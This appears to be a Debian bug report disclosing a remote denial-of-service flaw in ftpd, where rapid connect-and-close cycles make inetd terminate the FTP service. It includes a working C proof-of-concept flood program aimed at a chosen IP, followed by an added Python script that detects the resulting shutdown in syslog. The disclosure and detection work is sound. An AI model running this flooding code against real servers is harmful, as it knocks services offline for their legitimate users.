Package: ftpd
Status: install ok installed
Maintainer: Alberto Gonzalez Iniesta <[EMAIL PROTECTED]>
Architecture: i386
Version: 0.17-21

I'm currently running Debian testing with a few packages from unstable.

I've discovered a vulnerability which would allow a remote denial of
service attack in the ftpd program. It is caused by someone rapidly
opening a socket, connecting to the server, then closing the socket, and
I've written a small example which can be examined below.

Here's a timeline of what an attack might look like:

* program rapidly opens a socket, connect()'s, then closes the socket
* inetd redundantly reports: in.ftpd: connect from [host]
* inetd, then, reports the message: ftp/tcp server failing (looping),
service terminated

* existing connections continue to work, however,
* since ftpd is down, no new connections can be established

* after about ten minutes, ftpd is restarted


As promised, here's an example program. This will attempt to use the
first argument as an IP address if one is supplied, otherwise it will
use 127.0.0.1.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>


int sock;
struct sockaddr_in addr;


void open_socket()
{
        
        sock = socket(AF_INET, SOCK_STREAM, 0);
        
        if ( connect(sock, (struct sockaddr *)&addr, sizeof (struct sockaddr)) < 0 )
        {
                fprintf(stderr, "Error\n");
                close(sock);
                exit(1);
        }

}



int main(int argc, char * argv[])
{
        
        char * address = "127.0.0.1";
        int port = 21;

        if (argc == 2)
                address = argv[1];
        
        
        addr.sin_family = AF_INET;
        addr.sin_addr.s_addr = inet_addr(address);
        addr.sin_port = htons(port);
        
        
        int over = 0;
        printf("Assaulting server\n");
        
        while (over < 100)
        {
                open_socket();
                close(sock);
                
                over++;
        }
        
        return 0;
        
}
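
A log-side check for the sequence in the timeline above, as an added example that is not part of the original report: it scans syslog lines for inetd's "server failing (looping), service terminated" message and counts which hosts produced "connect from" entries just before it. The sample lines, hostname, PIDs, syslog prefix layout and the 60-second window are constructed assumptions.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Message texts follow the two log messages quoted in the report; the syslog
# prefix (timestamp, hostname, pid) is an assumed layout.
CONNECT = re.compile(r"^(\w{3} +\d+ [\d:]{8}) \S+ in\.ftpd\[\d+\]: connect from (\S+)")
LOOPING = re.compile(r"^(\w{3} +\d+ [\d:]{8}) \S+ inetd\[\d+\]: (\S+) server failing "
                     r"\(looping\), service terminated")

def parse_ts(text):
    # Syslog timestamps carry no year; a fixed one is assumed so deltas work.
    return datetime.strptime("2000 " + " ".join(text.split()), "%Y %b %d %H:%M:%S")

def find_shutdowns(lines, window=timedelta(seconds=60)):
    """Return one finding per inetd 'looping' shutdown, with the hosts that
    connected during the preceding window (60 s is an assumed value)."""
    connects, findings = [], []
    for line in lines:
        m = CONNECT.match(line)
        if m:
            connects.append((parse_ts(m.group(1)), m.group(2)))
            continue
        m = LOOPING.match(line)
        if m:
            when = parse_ts(m.group(1))
            recent = Counter(h for t, h in connects
                             if timedelta(0) <= when - t <= window)
            findings.append({"service": m.group(2), "time": m.group(1),
                             "sources": recent.most_common(3)})
    return findings

def build_sample():
    # Constructed log lines (documentation addresses), not taken from the report.
    lines = ["Jan 10 11:58:30 ftphost in.ftpd[2001]: connect from 198.51.100.4"]
    lines += [f"Jan 10 12:00:{i // 10:02d} ftphost in.ftpd[{2100 + i}]: "
              f"connect from 192.0.2.7" for i in range(100)]
    lines.append("Jan 10 12:00:10 ftphost inetd[412]: ftp/tcp server failing "
                 "(looping), service terminated")
    return lines

if __name__ == "__main__":
    for f in find_shutdowns(build_sample()):
        print(f["time"], f["service"], "terminated; top sources:", f["sources"])
```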
